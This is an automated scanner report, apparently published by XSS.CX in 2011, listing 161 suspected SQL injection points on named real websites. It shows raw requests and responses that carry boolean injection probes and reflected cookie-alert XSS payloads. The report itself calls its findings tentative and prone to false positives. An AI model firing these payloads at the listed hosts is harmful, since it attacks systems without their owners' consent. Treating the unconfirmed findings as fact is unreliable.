SQL Injection, DORKS, CWE-89, CAPEC-66, Vulnerable Hosts, Exploits

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Fri Mar 25 13:31:53 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

1.2. http://cache-www.pronto.com/combine.phpd6bdb [REST URL parameter 1]

1.3. http://cache-www.pronto.com/combine.phpd6bdb [name of an arbitrarily supplied request parameter]

1.4. http://cache-www.pronto.com/combine.phpd6bdb'>9cb9ce2aee9 [name of an arbitrarily supplied request parameter]

1.6. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [REST URL parameter 1]

1.7. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [Referer HTTP header]

1.8. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [name of an arbitrarily supplied request parameter]

1.9. http://events.oracle.com/search/search [9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter]

1.10. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [flash parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

1.13. http://googleads.g.doubleclick.net/pagead/ads [id cookie]

1.14. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

1.15. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

1.16. http://googleads.g.doubleclick.net/pagead/ads [u_his parameter]

1.17. http://googleads.g.doubleclick.net/pagead/ads [u_java parameter]

1.18. http://jobs.adoperationsonline.com/a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c

1.19. http://login1.vindicosuite.com/vindico_dynamic.asp [password parameter]

1.20. http://login1.vindicosuite.com/vindico_dynamic.asp [username parameter]

1.21. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 1]

1.22. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 2]

1.23. http://outils.icor.b2f-concept.net/newsletter/inscription_newsletter.php [org_id parameter]

1.24. http://parkcitytrips.com/booking_results.php [cloneID parameter]

1.25. http://parkcitytrips.com/booking_results.php [cloneID parameter]

1.26. http://parkcitytrips.com/booking_results.php [group_id parameter]

1.27. http://parkcitytrips.com/booking_results.php [name of an arbitrarily supplied request parameter]

1.28. http://pixel.yola.com/LoggingAgent/LoggingAgent [Referer HTTP header]

1.29. http://pixel.yola.com/LoggingAgent/LoggingAgent [sitereferer parameter]

1.30. http://thethrottle.com/ [Referer HTTP header]

1.31. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.32. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.33. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [VINDICOAUDIENCEISSUEDIDENTITY cookie]

1.34. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [__qca cookie]

1.35. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.36. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.37. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.38. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.39. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.40. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [name of an arbitrarily supplied request parameter]

1.41. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [redirect parameter]

1.42. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.43. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.44. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.45. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.46. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [vpp cookie]

1.47. http://www.b2f-concept.com/KERNEL/ [ASPSESSIONIDCSABRTBS cookie]

1.48. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

1.49. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

1.50. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

1.51. http://www.b2f-concept.com/KERNEL/ [Referer HTTP header]

1.52. http://www.b2f-concept.com/KERNEL/ [U parameter]

1.53. http://www.b2f-concept.com/KERNEL/ [U parameter]

1.54. http://www.b2f-concept.com/KERNEL/ [VISITEUR cookie]

1.55. http://www.b2f-concept.com/KERNEL/ [__utmb cookie]

1.56. http://www.b2f-concept.com/KERNEL/ [__utmc cookie]

1.57. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [INFORUB parameter]

1.58. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [__utmz cookie]

1.59. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]

1.60. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]

1.61. http://www.b2f-concept.com/KERNEL/DOC.ASP [id parameter]

1.62. http://www.b2f-concept.com/KERNEL/DOC.asp [id parameter]

1.63. http://www.b2f-concept.com/KERNEL/index.asp [NODE_ID parameter]

1.64. http://www.b2f-concept.com/KERNEL/index.asp [Referer HTTP header]

1.65. http://www.baysideeyes.com.au/ [name of an arbitrarily supplied request parameter]

1.66. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]

1.67. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

1.68. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

1.69. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 4]

1.70. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

1.71. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

1.72. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

1.73. http://www.caribbean-ocean.com/countries2.php [id parameter]

1.74. http://www.caribbean-ocean.com/countries2.php [name of an arbitrarily supplied request parameter]

1.75. http://www.caribbean-ocean.com/enquiry.php [accomm_id parameter]

1.76. http://www.caribbean-ocean.com/enquiry.php [name of an arbitrarily supplied request parameter]

1.77. http://www.caribbean-ocean.com/gallery.php [accomm_id parameter]

1.78. http://www.caribbean-ocean.com/gallery.php [name of an arbitrarily supplied request parameter]

1.79. http://www.caribbean-ocean.com/get-image.php [id parameter]

1.80. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

1.81. http://www.caribbean-ocean.com/luxury%20Anguilla%20Resort%20holidays/112 [REST URL parameter 2]

1.82. http://www.caribbean-ocean.com/luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106 [REST URL parameter 2]

1.83. http://www.caribbean-ocean.com/luxury%20Aruba%20Resort%20holidays/307 [REST URL parameter 2]

1.84. http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116 [REST URL parameter 2]

1.85. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

1.86. http://www.caribbean-ocean.com/luxury%20Bermuda%20Resort%20holidays/119 [REST URL parameter 2]

1.87. http://www.caribbean-ocean.com/luxury%20Bonaire%20Island%20holidays/308 [REST URL parameter 2]

1.88. http://www.caribbean-ocean.com/luxury%20British%20Virgin%20Islands%20holidays/108 [REST URL parameter 2]

1.89. http://www.caribbean-ocean.com/luxury%20Cayman%20Islands%20holidays/115 [REST URL parameter 2]

1.90. http://www.caribbean-ocean.com/luxury%20Cuba%20Resort%20holidays/118 [REST URL parameter 2]

1.91. http://www.caribbean-ocean.com/luxury%20Curacao%20holidays/305 [REST URL parameter 2]

1.92. http://www.caribbean-ocean.com/luxury%20Dominica%20holidays/111 [REST URL parameter 2]

1.93. http://www.caribbean-ocean.com/luxury%20Dominican%20Republic%20Resort%20holidays/302 [REST URL parameter 2]

1.94. http://www.caribbean-ocean.com/luxury%20Dutch%20Antilles%20Resort%20holidays/177 [REST URL parameter 2]

1.95. http://www.caribbean-ocean.com/luxury%20Grenada%20Resort%20holidays/107 [REST URL parameter 2]

1.96. http://www.caribbean-ocean.com/luxury%20Guadeloupe%20holidays/303 [REST URL parameter 2]

1.97. http://www.caribbean-ocean.com/luxury%20Haiti%20holidays/301 [REST URL parameter 2]

1.98. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

1.99. http://www.caribbean-ocean.com/luxury%20Maldives%20Hotel%20holidays/12 [REST URL parameter 2]

1.100. http://www.caribbean-ocean.com/luxury%20Martinique%20Hotel%20holidays/304 [REST URL parameter 2]

1.101. http://www.caribbean-ocean.com/luxury%20Montserrat%20Hotel%20holidays/309 [REST URL parameter 2]

1.102. http://www.caribbean-ocean.com/luxury%20Saba%20holidays/312 [REST URL parameter 2]

1.103. http://www.caribbean-ocean.com/luxury%20Saint%20Barthelemy%20holidays/310 [REST URL parameter 2]

1.104. http://www.caribbean-ocean.com/luxury%20Saint%20Eustatius%20holidays/311 [REST URL parameter 2]

1.105. http://www.caribbean-ocean.com/luxury%20Saint%20Lucia%20Hotel%20holidays/99 [REST URL parameter 2]

1.106. http://www.caribbean-ocean.com/luxury%20St%20Barths%20Hotel%20holidays/113 [REST URL parameter 2]

1.107. http://www.caribbean-ocean.com/luxury%20St%20Kitts%20and%20Nevis%20holidays/110 [REST URL parameter 2]

1.108. http://www.caribbean-ocean.com/luxury%20St%20Martin%20Hotel%20holidays/255 [REST URL parameter 2]

1.109. http://www.caribbean-ocean.com/luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109 [REST URL parameter 2]

1.110. http://www.caribbean-ocean.com/luxury%20Tobago%20Resort%20holidays/104 [REST URL parameter 2]

1.111. http://www.caribbean-ocean.com/luxury%20US%20Virgin%20Islands%20Resort%20holidays/288 [REST URL parameter 2]

1.112. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [User-Agent HTTP header]

1.113. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [name of an arbitrarily supplied request parameter]

1.114. http://www.forex-direkt.de/ [b35b2--%3E%3Cscript%3Ealert(document.cookie parameter]

1.115. http://www.gamespy.com/ [Referer HTTP header]

1.116. http://www.hameaualbert.fr/misc/drupal.js1ca13">

1.117. http://www.hameaualbert.fr/misc/drupal.js1ca13">0bfdceb7ad4 [REST URL parameter 2]

1.118. http://www.intranetjournal.com/ [User-Agent HTTP header]

1.119. http://www.masstransitmag.com/online/article.jsp [id parameter]

1.120. https://www.networksolutions.com/manage-it/renewal-center.jsp [7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter]

1.121. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 1]

1.122. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 2]

1.123. https://www.networksolutions.com/manage-it/renewal-center.jsp [Referer HTTP header]

1.124. https://www.networksolutions.com/manage-it/renewal-center.jsp [User-Agent HTTP header]

1.125. https://www.networksolutions.com/manage-it/renewal-center.jsp [name of an arbitrarily supplied request parameter]

1.126. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie parameter]

1.127. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter]

1.128. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

1.129. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

1.130. http://www.phpbuilder.com/ [Referer HTTP header]

1.131. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

1.132. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

1.133. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]

1.134. http://www.slackbooks.com/essentialknee [REST URL parameter 1]

1.135. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]

1.136. http://www.slackbooks.com/orthopedics [REST URL parameter 1]

1.137. http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ [User-Agent HTTP header]

1.138. http://www.thecounter.com/ [Referer HTTP header]

1.139. http://www.thedailybeast.com/author/lloyd-grove/ [REST URL parameter 2]

1.140. http://www.thedailybeast.com/author/lloyd-grove/'"--> [REST URL parameter 2]

1.142. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]

1.143. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]

1.144. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [CLK parameter]

1.145. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [QTR parameter]

1.146. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [Referer HTTP header]

1.147. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]

1.148. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]

1.149. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

1.150. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

1.151. http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

1.152. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 1]

1.153. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 2]

1.154. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 3]

1.155. http://www.wi-fihotspotlist.com/ [User-Agent HTTP header]

1.156. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09 [REST URL parameter 1]

1.157. http://www.wreg.com/tivid.html [playerID parameter]

1.158. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [User-Agent HTTP header]

1.159. http://www4.jcpenney.com/jcp/XGN.aspx [pcat parameter]

1.160. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2]

1.161. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2]


1. SQL injection
There are 161 instances of this issue:

1.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The num parameter appears to be vulnerable to SQL injection attacks. The payloads 22340464'%20or%201%3d1--%20 and 22340464'%20or%201%3d2--%20 were each submitted in the num parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d1--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookie HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7344
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 18 Mar 2011 15:42:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 18 Mar 2011 15:27:05 GMT
Expires: Fri, 18 Mar 2011 15:27:05 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 27 16:38:46 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/578176/GREY-HOSTING-728x90.swf";
var gif = "http://s0.2mdn.net/578176/ns_0003_hosting_728x90.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ace/7/1d9/%2a/h%3B234419623%3B0-0%3B0%3B50265527%3B3454-728/90%3B40008057/40025844/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d1--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookiehttp://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V102&promo=BCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ace/7/1d9/%2a/h%3B234419623%3B0-0%3B0%3B50265527%3B3454-728/90%3B40008057/40025844/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE
...[SNIP]...

Request 2

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d2--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookie HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 935
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 18 Mar 2011 15:42:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 18 Mar 2011 15:27:05 GMT
Expires: Fri, 18 Mar 2011 15:27:05 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ace/4/1d9/%2a/v;234421248;0-0;0;50265527;3454-728/90;40028948/40046735/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d2--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookiehttp://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D691E0000V101"><img src="http://s0.2mdn.net/viewad/578176/728x90_WebsiteTrial.gif" border=0 alt="Advertisement"></a></body></html>
1.2. http://cache-www.pronto.com/combine.phpd6bdb [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache-www.pronto.com
Path:   /combine.phpd6bdb

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13149058'%20or%201%3d1--%20 and 13149058'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /combine.phpd6bdb13149058'%20or%201%3d1--%20 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93867


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=-4783104c-12ec9955a5f--7a65">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class=
...[SNIP]...

Request 2

GET /combine.phpd6bdb13149058'%20or%201%3d2--%20 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93857


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=6529688a-12ec97d373c-5fb0">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=6529688a-12ec97d373c-5fb0">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=6529688a-12ec97d373c-5fb0">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=6529688a-12ec97d373c-5fb0">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=6529688a-12ec97d373c-5fb0">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
